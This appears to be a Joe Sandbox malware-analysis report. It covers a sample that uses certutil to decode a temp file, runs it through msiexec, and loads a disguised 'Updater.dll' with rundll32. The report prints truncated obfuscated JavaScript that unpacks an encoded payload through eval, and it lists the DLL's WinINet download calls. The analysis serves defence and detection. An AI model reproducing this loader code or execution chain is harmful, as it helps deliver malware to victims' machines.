Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:48:40
Start date:	24/10/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp
Imagebase:	0x7ff7c3690000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:49:40
Start date:	24/10/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Imagebase:	0x7ff72fcc0000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:49:40
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:50:10
Start date:	24/10/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp
Imagebase:	0x7ff7c3690000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:50:12
Start date:	24/10/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe "C:\ProgramData\Tyrannosaurus Tech\Updater.dll",Start /u
Imagebase:	0x7ff667060000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

JavaScript Code

Call Graph

Executed
Not Executed

Script:

Code
0	function a0_0x31b0(_0x189288, _0x24a2a1) {	a0_0x31b0(6504) ➔ "FvpO9v\|gz2" a0_0x31b0(9588) ➔ "2eAAAATIvR" a0_0x31b0(15647) ➔ "AABJbml0aW" a0_0x31b0(950) ➔ "fdIg\|9Ii8d" a0_0x31b0(652) ➔ "VVZXWFlaYW" a0_0x31b0(11785) ➔ "3AYABAAAA\|" a0_0x31b0(3395) ➔ "ESIlYCEiJa" a0_0x31b0(10102) ➔ "9O4\|3w4v7i" a0_0x31b0(378) ➔ "VIg\|JasRAA" a0_0x31b0(13212) ➔ "8NIi9PoRBo"
1	var _0x22e077 = a0_0x22e0 ( );	a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1...
2	return a0_0x31b0 =
3	function (_0x31b09f, _0x5b8e46) {	a0_0x31b0(6504,undefined) ➔ "FvpO9v\|gz2" a0_0x31b0(9588,undefined) ➔ "2eAAAATIvR" a0_0x31b0(15647,undefined) ➔ "AABJbml0aW" a0_0x31b0(950,undefined) ➔ "fdIg\|9Ii8d" a0_0x31b0(652,undefined) ➔ "VVZXWFlaYW" a0_0x31b0(11785,undefined) ➔ "3AYABAAAA\|" a0_0x31b0(3395,undefined) ➔ "ESIlYCEiJa" a0_0x31b0(10102,undefined) ➔ "9O4\|3w4v7i" a0_0x31b0(378,undefined) ➔ "VIg\|JasRAA" a0_0x31b0(13212,undefined) ➔ "8NIi9PoRBo"
4	_0x31b09f = _0x31b09f - 0x78;
5	var _0x404deb = _0x22e077[_0x31b09f];
6	return _0x404deb;
7	}, a0_0x31b0 ( _0x189288, _0x24a2a1 );
8	}
9	function a0_0x22e0() {	a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1...
10	var _0x5e8ae9 = [ '\|LJAAA8AAA', '(\x27pm\x27);t0=', 'Zvcm1hdG\|d', 'ol1hIl0JHh', 'BIjRVRuAAA', 'Xb...
11	a0_0x22e0 =
12	function () {	a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1... a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1...
13	return _0x5e8ae9;
14	};
15	return a0_0x22e0 ( );	a0_0x22e0() ➔ \|LJAAA8AAA,('pm');t0=,Zvcm1hdG\|d,ol1hIl0JHh,BIjRVRuAAA,Xb/Xa');t0,ACjMAQABIw,a');t0=t0.,2F9nQOSI1...
16	}
17	var a0_0x586d93 = a0_0x31b0;
18	( function (_0x5533ee, _0x5456a0) {	(function a0_0x22e0(),551452) ➔ undefined (function a0_0x22e0(),551452) ➔ undefined
19	var a0_0x349fd4 = {
20	_0x5da80d : 0x1968,
21	_0x251157 : 0x28c,
22	_0x13d08d : 0x2e09,
23	_0x4d00a2 : 0x2776,
24	_0x431318 : 0x339c,
25	_0x375af7 : 0x3793,
26	_0x396873 : 0x3072
27	}, _0x16ba99 = a0_0x31b0, _0x458986 = _0x5533ee ( );
28	while (! ! [ ] )
29	{
30	try
31	{
32	var _0x7528a3 = - parseInt ( _0x16ba99 ( a0_0x349fd4._0x5da80d ) ) / 0x1 * ( - parseInt ( _0x16ba...	a0_0x31b0(6504) ➔ "FvpO9v\|gz2" parseInt("FvpO9v\|gz2") ➔ NaN a0_0x31b0(9588) ➔ "2eAAAATIvR" parseInt("2eAAAATIvR") ➔ 2 a0_0x31b0(15647) ➔ "AABJbml0aW" parseInt("AABJbml0aW") ➔ NaN a0_0x31b0(950) ➔ "fdIg\|9Ii8d" parseInt("fdIg\|9Ii8d") ➔ NaN a0_0x31b0(652) ➔ "VVZXWFlaYW" parseInt("VVZXWFlaYW") ➔ NaN a0_0x31b0(11785) ➔ "3AYABAAAA\|" parseInt("3AYABAAAA\|") ➔ 3 a0_0x31b0(3395) ➔ "ESIlYCEiJa" parseInt("ESIlYCEiJa") ➔ NaN a0_0x31b0(10102) ➔ "9O4\|3w4v7i" parseInt("9O4\|3w4v7i") ➔ 9 a0_0x31b0(378) ➔ "VIg\|JasRAA" parseInt("VIg\|JasRAA") ➔ NaN a0_0x31b0(13212) ➔ "8NIi9PoRBo" parseInt("8NIi9PoRBo") ➔ 8 _0x16ba99(14227) ➔ "Ckw\|DOYbFw" parseInt("Ckw\|DOYbFw") ➔ NaN _0x16ba99(12402) ➔ "wn376MYenu" parseInt("wn376MYenu") ➔ NaN _0x16ba99(6504) ➔ "1l9/1l8');" parseInt("1l9/1l8');") ➔ 1 _0x16ba99(9588) ➔ "YD7YEMEGIQ" parseInt("YD7YEMEGIQ") ➔ NaN _0x16ba99(15647) ➔ "AAABQBAAAA" parseInt("AAABQBAAAA") ➔ NaN _0x16ba99(950) ➔ "FBFM8lFM8A" parseInt("FBFM8lFM8A") ➔ NaN _0x16ba99(652) ➔ "yut\|4bL\|N0" parseInt("yut\|4bL\|N0") ➔ NaN _0x16ba99(11785) ➔ "6CYIAA\|ART" parseInt("6CYIAA\|ART") ➔ 6 _0x16ba99(3395) ➔ "('1jE/0');" parseInt("('1jE/0');") ➔ NaN _0x16ba99(10102) ➔ "0.5('1pS')" parseInt("0.5('1pS')") ➔ 0 _0x16ba99(378) ➔ "aAAAPWgAAE" parseInt("aAAAPWgAAE") ➔ NaN _0x16ba99(13212) ➔ "\|OswEAA\|CF" parseInt("\|OswEAA\|CF") ➔ NaN _0x16ba99(14227) ➔ "z0kj3902NS" parseInt("z0kj3902NS") ➔ NaN _0x16ba99(12402) ➔ "U11dGV4VwA" parseInt("U11dGV4VwA") ➔ NaN _0x16ba99(6504) ➔ "AABIg8\|dQd" parseInt("AABIg8\|dQd") ➔ NaN _0x16ba99(9588) ➔ "+1oU');t0=" parseInt("+1oU');t0=") ➔ 1 _0x16ba99(15647) ➔ "1Tm+1Tl/1T" parseInt("1Tm+1Tl/1T") ➔ 1 _0x16ba99(950) ➔ "FzPSi85EjU" parseInt("FzPSi85EjU") ➔ NaN _0x16ba99(652) ➔ "A\|9Ihdt0Ao" parseInt("A\|9Ihdt0Ao") ➔ NaN _0x16ba99(11785) ➔ "('FN///M/I" parseInt("('FN///M/I") ➔ NaN _0x16ba99(3395) ➔ "f/13e');t0" parseInt("f/13e');t0") ➔ NaN _0x16ba99(10102) ➔ "AAJixAYABA" parseInt("AAJixAYABA") ➔ NaN _0x16ba99(378) ➔ "AoAA\|NAAoA" parseInt("AoAA\|NAAoA") ➔ NaN _0x16ba99(13212) ➔ "UJJABAAC\|E" parseInt("UJJABAAC\|E") ➔ NaN _0x16ba99(14227) ➔ "IvwRYTkD4X" parseInt("IvwRYTkD4X") ➔ NaN _0x16ba99(12402) ➔ "c1NldFZhbH" parseInt("c1NldFZhbH") ➔ NaN _0x16ba99(6504) ➔ "CyRwAAAM0B" parseInt("CyRwAAAM0B") ➔ NaN _0x16ba99(9588) ➔ "USI1MJCDoU" parseInt("USI1MJCDoU") ➔ NaN _0x16ba99(15647) ➔ "TW/TV');t0" parseInt("TW/TV');t0") ➔ NaN _0x16ba99(950) ➔ "+Hw');t0=t" parseInt("+Hw');t0=t") ➔ NaN _0x16ba99(652) ➔ "APhC\|hFi8V" parseInt("APhC\|hFi8V") ➔ NaN _0x16ba99(11785) ➔ "3BkGNSQLrq" parseInt("3BkGNSQLrq") ➔ 3 _0x16ba99(3395) ➔ "0.5('17a')" parseInt("0.5('17a')") ➔ 0 _0x16ba99(10102) ➔ "AQEBA\|\|\|QA" parseInt("AQEBA\|\|\|QA") ➔ NaN _0x16ba99(378) ➔ "Y08v0EPt8e" parseInt("Y08v0EPt8e") ➔ NaN _0x16ba99(13212) ➔ "AABMjVD\|pI" parseInt("AABMjVD\|pI") ➔ NaN _0x16ba99(14227) ➔ "5('Jg/1Cx'" parseInt("5('Jg/1Cx'") ➔ 5 _0x16ba99(12402) ➔ "t0.5('1IH/" parseInt("t0.5('1IH/") ➔ NaN _0x16ba99(6504) ➔ "EwK8HWtDyl" parseInt("EwK8HWtDyl") ➔ NaN _0x16ba99(9588) ➔ "o\|AAOhm3v\|" parseInt("o\|AAOhm3v\|") ➔ NaN _0x16ba99(15647) ➔ "v\|ddCF20iL" parseInt("v\|ddCF20iL") ➔ NaN _0x16ba99(950) ➔ "2hpamtsbW5" parseInt("2hpamtsbW5") ➔ 2 _0x16ba99(652) ➔ "qy+1qx');t" parseInt("qy+1qx');t") ➔ NaN _0x16ba99(11785) ➔ "('19S');t0" parseInt("('19S');t0") ➔ NaN _0x16ba99(3395) ➔ "AAAB84AEAA" parseInt("AAAB84AEAA") ➔ NaN _0x16ba99(10102) ➔ "AAA\|CiAOEw" parseInt("AAA\|CiAOEw") ➔ NaN _0x16ba99(378) ➔ "DTIvJTSvIQ" parseInt("DTIvJTSvIQ") ➔ NaN _0x16ba99(13212) ➔ "sFVcoAAEgz" parseInt("sFVcoAAEgz") ➔ NaN _0x16ba99(14227) ➔ "ABQTQAAAAA" parseInt("ABQTQAAAAA") ➔ NaN _0x16ba99(12402) ➔ "('kR');t0=" parseInt("('kR');t0=") ➔ NaN _0x16ba99(6504) ➔ "RI0EEEQ7wH" parseInt("RI0EEEQ7wH") ➔ NaN _0x16ba99(9588) ➔ "0=t0.5('j/" parseInt("0=t0.5('j/") ➔ 0 _0x16ba99(15647) ➔ "\|AAgKgBgAE" parseInt("\|AAgKgBgAE") ➔ NaN _0x16ba99(950) ➔ "wGgAASDPM6" parseInt("wGgAASDPM6") ➔ NaN _0x16ba99(652) ➔ "EgAEAAQABA" parseInt("EgAEAAQABA") ➔ NaN _0x16ba99(11785) ➔ "AE0ASwAAAA" parseInt("AE0ASwAAAA") ➔ NaN _0x16ba99(3395) ➔ "V5\|wwSIvxi" parseInt("V5\|wwSIvxi") ➔ NaN _0x16ba99(10102) ➔ "GLyEiDw\|8A" parseInt("GLyEiDw\|8A") ➔ NaN _0x16ba99(378) ➔ "ml0aWNhbFN" parseInt("ml0aWNhbFN") ➔ NaN _0x16ba99(13212) ➔ "AMJn\|rjaM9" parseInt("AMJn\|rjaM9") ➔ NaN _0x16ba99(14227) ➔ "'T+12l');t" parseInt("'T+12l');t") ➔ NaN _0x16ba99(12402) ➔ "FIg\|32BvJg" parseInt("FIg\|32BvJg") ➔ NaN _0x16ba99(6504) ➔ "Ig\|0iLjWg\|" parseInt("Ig\|0iLjWg\|") ➔ NaN _0x16ba99(9588) ➔ "1pT');t0=t" parseInt("1pT');t0=t") ➔ 1 _0x16ba99(15647) ➔ "('s8');t0=" parseInt("('s8');t0=") ➔ NaN _0x16ba99(950) ➔ "AHoALQB1AH" parseInt("AHoALQB1AH") ➔ NaN _0x16ba99(652) ➔ "J\|xBECuAPE" parseInt("J\|xBECuAPE") ➔ NaN _0x16ba99(11785) ➔ ".5('sF+Po'" parseInt(".5('sF+Po'") ➔ NaN _0x16ba99(3395) ➔ "iHwkWGaJfR" parseInt("iHwkWGaJfR") ➔ NaN _0x16ba99(10102) ➔ "gCZoXAdeDr" parseInt("gCZoXAdeDr") ➔ NaN _0x16ba99(378) ➔ "0=t0.5('n1" parseInt("0=t0.5('n1") ➔ 0 _0x16ba99(13212) ➔ "JgHAABIOR2" parseInt("JgHAABIOR2") ➔ NaN _0x16ba99(14227) ➔ "5('1yZ');t" parseInt("5('1yZ');t") ➔ 5 _0x16ba99(12402) ➔ "Ffw0iJXCQY" parseInt("Ffw0iJXCQY") ➔ NaN _0x16ba99(6504) ➔ "QkyAAAAIlE" parseInt("QkyAAAAIlE") ➔ NaN _0x16ba99(9588) ➔ "AAMGABg\|Dw" parseInt("AAMGABg\|Dw") ➔ NaN _0x16ba99(15647) ➔ "('IO');t0=" parseInt("('IO');t0=") ➔ NaN _0x16ba99(950) ➔ "h90DAABMjQ" parseInt("h90DAABMjQ") ➔ NaN _0x16ba99(652) ➔ "5('ri');t0" parseInt("5('ri');t0") ➔ 5 _0x16ba99(11785) ➔ "LDM\|Pdc1Ii" parseInt("LDM\|Pdc1Ii") ➔ NaN _0x16ba99(3395) ➔ "mLzOiLHAAA" parseInt("mLzOiLHAAA") ➔ NaN _0x16ba99(10102) ➔ "qiiqOKpIql" parseInt("qiiqOKpIql") ➔ NaN _0x16ba99(378) ➔ "AQEAAAAAAA" parseInt("AQEAAAAAAA") ➔ NaN _0x16ba99(13212) ➔ "t0.5('nK')" parseInt("t0.5('nK')") ➔ NaN _0x16ba99(14227) ➔ "EiF\|oAEEAA" parseInt("EiF\|oAEEAA") ➔ NaN _0x16ba99(12402) ➔ "Ly0iJBdxqA" parseInt("Ly0iJBdxqA") ➔ NaN _0x16ba99(6504) ➔ "IPAMEg72\|i" parseInt("IPAMEg72\|i") ➔ NaN _0x16ba99(9588) ➔ "=t0.5('1Uz" parseInt("=t0.5('1Uz") ➔ NaN _0x16ba99(15647) ➔ "4uYAgAA6Dj" parseInt("4uYAgAA6Dj") ➔ 4 _0x16ba99(950) ➔ "gGAAQAAAAw" parseInt("gGAAQAAAAw") ➔ NaN _0x16ba99(652) ➔ "('21s+37+2" parseInt("('21s+37+2") ➔ NaN _0x16ba99(11785) ➔ "5/1x4//1x3" parseInt("5/1x4//1x3") ➔ 5 _0x16ba99(3395) ➔ "L\|Ny6kiLXC" parseInt("L\|Ny6kiLXC") ➔ NaN _0x16ba99(10102) ➔ "eAP0A3AC3B" parseInt("eAP0A3AC3B") ➔ NaN _0x16ba99(378) ➔ "=t0.5('Fg'" parseInt("=t0.5('Fg'") ➔ NaN _0x16ba99(13212) ➔ "ABAAAAMGcB" parseInt("ABAAAAMGcB") ➔ NaN _0x16ba99(14227) ➔ "Cg\|ASAAD1E" parseInt("Cg\|ASAAD1E") ➔ NaN _0x16ba99(12402) ➔ "'1mh');t0=" parseInt("'1mh');t0=") ➔ NaN _0x16ba99(6504) ➔ "AABVAFMARQ" parseInt("AABVAFMARQ") ➔ NaN _0x16ba99(9588) ➔ "///13G');t" parseInt("///13G');t") ➔ NaN _0x16ba99(15647) ➔ "j0\|0IvQiUQ" parseInt("j0\|0IvQiUQ") ➔ NaN _0x16ba99(950) ➔ "GJhY2tzAEN" parseInt("GJhY2tzAEN") ➔ NaN _0x16ba99(652) ➔ "nAACFwA\|V7" parseInt("nAACFwA\|V7") ➔ NaN _0x16ba99(11785) ➔ "P8VNhoBAIX" parseInt("P8VNhoBAIX") ➔ NaN _0x16ba99(3395) ➔ "kRE\|xXnIgE" parseInt("kRE\|xXnIgE") ➔ NaN _0x16ba99(10102) ➔ "E//1wD');t" parseInt("E//1wD');t") ➔ NaN _0x16ba99(378) ➔ "AAAAABoAHI" parseInt("AAAAABoAHI") ➔ NaN _0x16ba99(13212) ➔ "cD\|AEKBAAK" parseInt("cD\|AEKBAAK") ➔ NaN _0x16ba99(14227) ➔ "BC\|AAAAAAA" parseInt("BC\|AAAAAAA") ➔ NaN _0x16ba99(12402) ➔ "HRNABxkTAA" parseInt("HRNABxkTAA") ➔ NaN
33	if ( _0x7528a3 === _0x5456a0 )
34	break ;
35	else
36	_0x458986['push'] ( _0x458986['shift'] ( ) );
37	}
38	catch ( _0x2c9b45 )
39	{
40	_0x458986['push'] ( _0x458986['shift'] ( ) );
41	}
42	}
43	} ( a0_0x22e0, 0x86a1c ),
44	eval (	eval("function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+...") ➔ undefined
45	function (_0x49ddc4, _0x3dd065, _0x5f4629, _0x5cf663, _0x30d96d, _0x17af86) {	("1n 19(28,3y,3A){q o="";q i=0;28F(i<3A-28.28E().28D){o=o+3y;i++}o=o+28;3w(o)}1n 25(t){q 11,27;11=...",62,8226,,,,,,concat,,,,,,,,,,,,,,,,,,,,,var,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,9Ii,time,AAAAAAAAAAAAAAAAA...,0,[object Object]) ➔ "function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+..."
46	var a0_0x43c335 = {
47	_0x411f1f : 0x3193
48	},
49	a0_0x17871b = {
50	_0x816139 : 0x1531
51	}, _0x567f62 = a0_0x31b0;
52	_0x30d96d =
53	function (_0x4a3f17) {	_0x30d96d(8225) ➔ "28F" _0x30d96d(132) ➔ "28" _0x30d96d(2) ➔ "2" _0x30d96d(8224) ➔ "28E" _0x30d96d(132) ➔ "28" _0x30d96d(2) ➔ "2" _0x30d96d(8223) ➔ "28D" _0x30d96d(132) ➔ "28" _0x30d96d(2) ➔ "2" _0x30d96d(8222) ➔ "28C"
54	var _0x516480 = a0_0x31b0;
55	return ( _0x4a3f17 < _0x3dd065 ? '' : _0x30d96d ( parseInt ( _0x4a3f17 / _0x3dd065 ) ) ) + ( ( _0...	parseInt(132.66129032258064) ➔ 132 _0x30d96d(132) ➔ "28" parseInt(2.129032258064516) ➔ 2 _0x30d96d(2) ➔ "2" _0x516480(8754) ➔ "fromCharCo" parseInt(132.6451612903226) ➔ 132 _0x30d96d(132) ➔ "28" parseInt(2.129032258064516) ➔ 2 _0x30d96d(2) ➔ "2" _0x516480(8754) ➔ "fromCharCo" parseInt(132.6290322580645) ➔ 132 _0x30d96d(132) ➔ "28" parseInt(2.129032258064516) ➔ 2 _0x30d96d(2) ➔ "2" _0x516480(8754) ➔ "fromCharCo" parseInt(132.61290322580646) ➔ 132 _0x30d96d(132) ➔ "28" parseInt(2.129032258064516) ➔ 2 _0x30d96d(2) ➔ "2" _0x516480(8754) ➔ "fromCharCo" parseInt(132.59677419354838) ➔ 132 _0x30d96d(132) ➔ "28" parseInt(2.129032258064516) ➔ 2 _0x30d96d(2) ➔ "2" _0x516480(8754) ➔ "fromCharCo" _0x516480(8754) ➔ "fromCharCo" _0x516480(8754) ➔ "fromCharCo" _0x516480(8754) ➔ "fromCharCo" _0x516480(8754) ➔ "fromCharCo" _0x516480(8754) ➔ "fromCharCo"
56	};
57	if ( ! ''[_0x567f62 ( a0_0x43c335._0x411f1f ) ] ( /^/, String ) )	_0x567f62(12691) ➔ "replace"
58	{
59	while (_0x5f4629 -- )
60	{
61	_0x17af86[_0x30d96d ( _0x5f4629 ) ] = _0x5cf663[_0x5f4629] \|\| _0x30d96d ( _0x5f4629 );	_0x30d96d(8225) ➔ "28F" _0x30d96d(8224) ➔ "28E" _0x30d96d(8223) ➔ "28D" _0x30d96d(8222) ➔ "28C" _0x30d96d(8221) ➔ "28B" _0x30d96d(8220) ➔ "28A" _0x30d96d(8219) ➔ "28z" _0x30d96d(8218) ➔ "28y" _0x30d96d(8217) ➔ "28x" _0x30d96d(8216) ➔ "28w" _0x30d96d(6624) ➔ "1IQ" _0x30d96d(6590) ➔ "1Ii" _0x30d96d(6404) ➔ "1Fi" _0x30d96d(6128) ➔ "1AQ" _0x30d96d(5716) ➔ "1uc" _0x30d96d(3758) ➔ "YC" _0x30d96d(3755) ➔ "Yz" _0x30d96d(3647) ➔ "WP" _0x30d96d(3571) ➔ "VB" _0x30d96d(3563) ➔ "Vt"
62	}
63	_0x5cf663 =
64	[ function (_0x296f06) {	("1n 19(28,3y,3A){q o="";q i=0;28F(i<3A-28.28E().28D){o=o+3y;i++}o=o+28;3w(o)}1n 25(t){q 11,27;11=...",62,8226,,,,,,concat,,,,,,,,,,,,,,,,,,,,,var,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,9Ii,time,AAAAAAAAAAAAAAAAA...,0,[object Object]) ➔ "function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+..."
65	return _0x17af86[_0x296f06];
66	} ],
67	_0x30d96d =
68	function () {	_0x30d96d(0) ➔ "\w+"
69	var _0x3694d3 = _0x567f62;
70	return _0x3694d3 ( a0_0x17871b._0x816139 );	_0x3694d3(5425) ➔ "\w+"
71	}, _0x5f4629 = 0x1;
72	}
73	;
74	while (_0x5f4629 -- )
75	{
76	_0x5cf663[_0x5f4629] && ( _0x49ddc4 = _0x49ddc4['replace'] ( new RegExp ( '\x5cb' + _0x30d96d ( _...	_0x30d96d(0) ➔ "\w+"
77	}
78	return _0x49ddc4;
79	} ( a0_0x586d93 ( 0x2c3a ) + a0_0x586d93 ( 0x2ed5 ) + a0_0x586d93 ( 0x2bdf ) + a0_0x586d93 ( 0x12...
80	{
81	} ) ) );

Reset < >

Analysis Process: rundll32.exePID: 5356, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.9%
Total number of Nodes:	1613
Total number of Limit Nodes:	34

Executed Functions

Function 00007FFE1A511C40 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 320
networklibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00007FFE1A511C8C
GetProcAddress.KERNEL32 ref: 00007FFE1A511CC3
GetProcAddress.KERNEL32 ref: 00007FFE1A511CFA
GetProcAddress.KERNEL32 ref: 00007FFE1A511D31
GetProcAddress.KERNEL32 ref: 00007FFE1A511D68
GetProcAddress.KERNEL32 ref: 00007FFE1A511D9F
GetProcAddress.KERNEL32 ref: 00007FFE1A511DD6
GetProcAddress.KERNEL32 ref: 00007FFE1A511E0D
GetProcAddress.KERNEL32 ref: 00007FFE1A511E44
InternetOpenW.WININET ref: 00007FFE1A511E68
InternetSetOptionW.WININET ref: 00007FFE1A511E94
InternetSetOptionW.WININET ref: 00007FFE1A511EAC
InternetSetOptionW.WININET ref: 00007FFE1A511EC4
InternetConnectW.WININET ref: 00007FFE1A511EED
HttpOpenRequestW.WININET ref: 00007FFE1A511F7B
SetLastError.KERNEL32 ref: 00007FFE1A51204C
HttpSendRequestW.WININET ref: 00007FFE1A512066
GetLastError.KERNEL32 ref: 00007FFE1A512071
InternetQueryOptionW.WININET ref: 00007FFE1A51209F
InternetSetOptionW.WININET ref: 00007FFE1A5120BF
HttpSendRequestW.WININET ref: 00007FFE1A5120D4

Part of subcall function 00007FFE1A515980: GetProcessHeap.KERNEL32(?,?,?,00007FFE1A5167BF), ref: 00007FFE1A515989

InternetReadFile.WININET ref: 00007FFE1A512101

Part of subcall function 00007FFE1A5159B0: GetProcessHeap.KERNEL32 ref: 00007FFE1A5159C0

InternetReadFile.WININET ref: 00007FFE1A512144
InternetCloseHandle.WININET ref: 00007FFE1A51216C
InternetCloseHandle.WININET ref: 00007FFE1A512177
InternetCloseHandle.WININET ref: 00007FFE1A512180

Strings

`, xrefs: 00007FFE1A511E8C

Memory Dump Source

Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

